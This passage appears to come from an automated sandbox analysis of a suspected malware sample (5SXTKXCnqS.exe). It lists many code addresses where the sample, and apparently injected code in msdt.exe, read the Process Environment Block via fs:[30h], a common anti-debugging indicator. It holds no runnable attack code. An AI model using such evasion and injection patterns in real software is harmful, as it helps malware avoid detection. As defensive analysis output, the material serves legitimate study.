          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E4BAD mov eax, dword ptr fs:[00000030h]2_2_009E4BAD
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A353CA mov eax, dword ptr fs:[00000030h]2_2_00A353CA
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A353CA mov eax, dword ptr fs:[00000030h]2_2_00A353CA
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DDBE9 mov eax, dword ptr fs:[00000030h]2_2_009DDBE9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E03E2 mov eax, dword ptr fs:[00000030h]2_2_009E03E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E03E2 mov eax, dword ptr fs:[00000030h]2_2_009E03E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E03E2 mov eax, dword ptr fs:[00000030h]2_2_009E03E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E03E2 mov eax, dword ptr fs:[00000030h]2_2_009E03E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E03E2 mov eax, dword ptr fs:[00000030h]2_2_009E03E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E03E2 mov eax, dword ptr fs:[00000030h]2_2_009E03E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7131B mov eax, dword ptr fs:[00000030h]2_2_00A7131B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BF358 mov eax, dword ptr fs:[00000030h]2_2_009BF358
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BDB40 mov eax, dword ptr fs:[00000030h]2_2_009BDB40
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E3B7A mov eax, dword ptr fs:[00000030h]2_2_009E3B7A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E3B7A mov eax, dword ptr fs:[00000030h]2_2_009E3B7A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A88B58 mov eax, dword ptr fs:[00000030h]2_2_00A88B58
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BDB60 mov ecx, dword ptr fs:[00000030h]2_2_009BDB60
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C849B mov eax, dword ptr fs:[00000030h]2_2_009C849B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36CF0 mov eax, dword ptr fs:[00000030h]2_2_00A36CF0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36CF0 mov eax, dword ptr fs:[00000030h]2_2_00A36CF0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36CF0 mov eax, dword ptr fs:[00000030h]2_2_00A36CF0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A714FB mov eax, dword ptr fs:[00000030h]2_2_00A714FB
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A88CD6 mov eax, dword ptr fs:[00000030h]2_2_00A88CD6
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71C06 mov eax, dword ptr fs:[00000030h]2_2_00A71C06
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A8740D mov eax, dword ptr fs:[00000030h]2_2_00A8740D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A8740D mov eax, dword ptr fs:[00000030h]2_2_00A8740D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A8740D mov eax, dword ptr fs:[00000030h]2_2_00A8740D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36C0A mov eax, dword ptr fs:[00000030h]2_2_00A36C0A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36C0A mov eax, dword ptr fs:[00000030h]2_2_00A36C0A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36C0A mov eax, dword ptr fs:[00000030h]2_2_00A36C0A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36C0A mov eax, dword ptr fs:[00000030h]2_2_00A36C0A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EBC2C mov eax, dword ptr fs:[00000030h]2_2_009EBC2C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EA44B mov eax, dword ptr fs:[00000030h]2_2_009EA44B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D746D mov eax, dword ptr fs:[00000030h]2_2_009D746D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4C450 mov eax, dword ptr fs:[00000030h]2_2_00A4C450
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4C450 mov eax, dword ptr fs:[00000030h]2_2_00A4C450
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A805AC mov eax, dword ptr fs:[00000030h]2_2_00A805AC
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A805AC mov eax, dword ptr fs:[00000030h]2_2_00A805AC
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EFD9B mov eax, dword ptr fs:[00000030h]2_2_009EFD9B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EFD9B mov eax, dword ptr fs:[00000030h]2_2_009EFD9B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B2D8A mov eax, dword ptr fs:[00000030h]2_2_009B2D8A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B2D8A mov eax, dword ptr fs:[00000030h]2_2_009B2D8A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B2D8A mov eax, dword ptr fs:[00000030h]2_2_009B2D8A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B2D8A mov eax, dword ptr fs:[00000030h]2_2_009B2D8A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009B2D8A mov eax, dword ptr fs:[00000030h]2_2_009B2D8A
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2581 mov eax, dword ptr fs:[00000030h]2_2_009E2581
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2581 mov eax, dword ptr fs:[00000030h]2_2_009E2581
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2581 mov eax, dword ptr fs:[00000030h]2_2_009E2581
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E2581 mov eax, dword ptr fs:[00000030h]2_2_009E2581
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E1DB5 mov eax, dword ptr fs:[00000030h]2_2_009E1DB5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E1DB5 mov eax, dword ptr fs:[00000030h]2_2_009E1DB5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E1DB5 mov eax, dword ptr fs:[00000030h]2_2_009E1DB5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E35A1 mov eax, dword ptr fs:[00000030h]2_2_009E35A1
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A7FDE2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A7FDE2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A7FDE2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]2_2_00A7FDE2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A68DF1 mov eax, dword ptr fs:[00000030h]2_2_00A68DF1
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36DC9 mov eax, dword ptr fs:[00000030h]2_2_00A36DC9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36DC9 mov eax, dword ptr fs:[00000030h]2_2_00A36DC9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36DC9 mov eax, dword ptr fs:[00000030h]2_2_00A36DC9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36DC9 mov ecx, dword ptr fs:[00000030h]2_2_00A36DC9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36DC9 mov eax, dword ptr fs:[00000030h]2_2_00A36DC9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A36DC9 mov eax, dword ptr fs:[00000030h]2_2_00A36DC9
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CD5E0 mov eax, dword ptr fs:[00000030h]2_2_009CD5E0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009CD5E0 mov eax, dword ptr fs:[00000030h]2_2_009CD5E0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A3A537 mov eax, dword ptr fs:[00000030h]2_2_00A3A537
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A88D34 mov eax, dword ptr fs:[00000030h]2_2_00A88D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E4D3B mov eax, dword ptr fs:[00000030h]2_2_009E4D3B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E4D3B mov eax, dword ptr fs:[00000030h]2_2_009E4D3B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E4D3B mov eax, dword ptr fs:[00000030h]2_2_009E4D3B
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C3D34 mov eax, dword ptr fs:[00000030h]2_2_009C3D34
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BAD30 mov eax, dword ptr fs:[00000030h]2_2_009BAD30
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009D7D50 mov eax, dword ptr fs:[00000030h]2_2_009D7D50
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F3D43 mov eax, dword ptr fs:[00000030h]2_2_009F3D43
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A33540 mov eax, dword ptr fs:[00000030h]2_2_00A33540
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DC577 mov eax, dword ptr fs:[00000030h]2_2_009DC577
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DC577 mov eax, dword ptr fs:[00000030h]2_2_009DC577
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A346A7 mov eax, dword ptr fs:[00000030h]2_2_00A346A7
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A80EA5 mov eax, dword ptr fs:[00000030h]2_2_00A80EA5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A80EA5 mov eax, dword ptr fs:[00000030h]2_2_00A80EA5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A80EA5 mov eax, dword ptr fs:[00000030h]2_2_00A80EA5
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A4FE87 mov eax, dword ptr fs:[00000030h]2_2_00A4FE87
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E36CC mov eax, dword ptr fs:[00000030h]2_2_009E36CC
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F8EC7 mov eax, dword ptr fs:[00000030h]2_2_009F8EC7
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A6FEC0 mov eax, dword ptr fs:[00000030h]2_2_00A6FEC0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E16E0 mov ecx, dword ptr fs:[00000030h]2_2_009E16E0
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A88ED6 mov eax, dword ptr fs:[00000030h]2_2_00A88ED6
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C76E2 mov eax, dword ptr fs:[00000030h]2_2_009C76E2
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EA61C mov eax, dword ptr fs:[00000030h]2_2_009EA61C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009EA61C mov eax, dword ptr fs:[00000030h]2_2_009EA61C
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A6FE3F mov eax, dword ptr fs:[00000030h]2_2_00A6FE3F
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BC600 mov eax, dword ptr fs:[00000030h]2_2_009BC600
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BC600 mov eax, dword ptr fs:[00000030h]2_2_009BC600
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BC600 mov eax, dword ptr fs:[00000030h]2_2_009BC600
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009E8E00 mov eax, dword ptr fs:[00000030h]2_2_009E8E00
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A71608 mov eax, dword ptr fs:[00000030h]2_2_00A71608
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009BE620 mov eax, dword ptr fs:[00000030h]2_2_009BE620
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C7E41 mov eax, dword ptr fs:[00000030h]2_2_009C7E41
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C7E41 mov eax, dword ptr fs:[00000030h]2_2_009C7E41
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C7E41 mov eax, dword ptr fs:[00000030h]2_2_009C7E41
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C7E41 mov eax, dword ptr fs:[00000030h]2_2_009C7E41
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C7E41 mov eax, dword ptr fs:[00000030h]2_2_009C7E41
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C7E41 mov eax, dword ptr fs:[00000030h]2_2_009C7E41
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DAE73 mov eax, dword ptr fs:[00000030h]2_2_009DAE73
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DAE73 mov eax, dword ptr fs:[00000030h]2_2_009DAE73
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DAE73 mov eax, dword ptr fs:[00000030h]2_2_009DAE73
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DAE73 mov eax, dword ptr fs:[00000030h]2_2_009DAE73
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009DAE73 mov eax, dword ptr fs:[00000030h]2_2_009DAE73
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C766D mov eax, dword ptr fs:[00000030h]2_2_009C766D
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009C8794 mov eax, dword ptr fs:[00000030h]2_2_009C8794
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A37794 mov eax, dword ptr fs:[00000030h]2_2_00A37794
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A37794 mov eax, dword ptr fs:[00000030h]2_2_00A37794
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_00A37794 mov eax, dword ptr fs:[00000030h]2_2_00A37794
          Source: C:\Users\user\Desktop\5SXTKXCnqS.exeCode function: 2_2_009F37F5 mov eax, dword ptr fs:[00000030h]2_2_009F37F5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCF0BF mov ecx, dword ptr fs:[00000030h]14_2_04BCF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCF0BF mov eax, dword ptr fs:[00000030h]14_2_04BCF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCF0BF mov eax, dword ptr fs:[00000030h]14_2_04BCF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C68CD6 mov eax, dword ptr fs:[00000030h]14_2_04C68CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BD90AF mov eax, dword ptr fs:[00000030h]14_2_04BD90AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]14_2_04C2B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2B8D0 mov ecx, dword ptr fs:[00000030h]14_2_04C2B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]14_2_04C2B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]14_2_04C2B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]14_2_04C2B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2B8D0 mov eax, dword ptr fs:[00000030h]14_2_04C2B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BA849B mov eax, dword ptr fs:[00000030h]14_2_04BA849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16CF0 mov eax, dword ptr fs:[00000030h]14_2_04C16CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16CF0 mov eax, dword ptr fs:[00000030h]14_2_04C16CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16CF0 mov eax, dword ptr fs:[00000030h]14_2_04C16CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04B99080 mov eax, dword ptr fs:[00000030h]14_2_04B99080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C514FB mov eax, dword ptr fs:[00000030h]14_2_04C514FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C13884 mov eax, dword ptr fs:[00000030h]14_2_04C13884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C13884 mov eax, dword ptr fs:[00000030h]14_2_04C13884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAB02A mov eax, dword ptr fs:[00000030h]14_2_04BAB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAB02A mov eax, dword ptr fs:[00000030h]14_2_04BAB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAB02A mov eax, dword ptr fs:[00000030h]14_2_04BAB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BAB02A mov eax, dword ptr fs:[00000030h]14_2_04BAB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCBC2C mov eax, dword ptr fs:[00000030h]14_2_04BCBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC002D mov eax, dword ptr fs:[00000030h]14_2_04BC002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC002D mov eax, dword ptr fs:[00000030h]14_2_04BC002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC002D mov eax, dword ptr fs:[00000030h]14_2_04BC002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC002D mov eax, dword ptr fs:[00000030h]14_2_04BC002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC002D mov eax, dword ptr fs:[00000030h]14_2_04BC002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2C450 mov eax, dword ptr fs:[00000030h]14_2_04C2C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C2C450 mov eax, dword ptr fs:[00000030h]14_2_04C2C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C61074 mov eax, dword ptr fs:[00000030h]14_2_04C61074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C52073 mov eax, dword ptr fs:[00000030h]14_2_04C52073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C51C06 mov eax, dword ptr fs:[00000030h]14_2_04C51C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C6740D mov eax, dword ptr fs:[00000030h]14_2_04C6740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C6740D mov eax, dword ptr fs:[00000030h]14_2_04C6740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C6740D mov eax, dword ptr fs:[00000030h]14_2_04C6740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16C0A mov eax, dword ptr fs:[00000030h]14_2_04C16C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16C0A mov eax, dword ptr fs:[00000030h]14_2_04C16C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16C0A mov eax, dword ptr fs:[00000030h]14_2_04C16C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C16C0A mov eax, dword ptr fs:[00000030h]14_2_04C16C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C64015 mov eax, dword ptr fs:[00000030h]14_2_04C64015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C64015 mov eax, dword ptr fs:[00000030h]14_2_04C64015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB746D mov eax, dword ptr fs:[00000030h]14_2_04BB746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C17016 mov eax, dword ptr fs:[00000030h]14_2_04C17016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C17016 mov eax, dword ptr fs:[00000030h]14_2_04C17016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04C17016 mov eax, dword ptr fs:[00000030h]14_2_04C17016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB0050 mov eax, dword ptr fs:[00000030h]14_2_04BB0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BB0050 mov eax, dword ptr fs:[00000030h]14_2_04BB0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BCA44B mov eax, dword ptr fs:[00000030h]14_2_04BCA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC1DB5 mov eax, dword ptr fs:[00000030h]14_2_04BC1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC1DB5 mov eax, dword ptr fs:[00000030h]14_2_04BC1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC1DB5 mov eax, dword ptr fs:[00000030h]14_2_04BC1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 14_2_04BC61A0 mov eax, dword ptr fs:[00000030h]14_2_04BC61A0
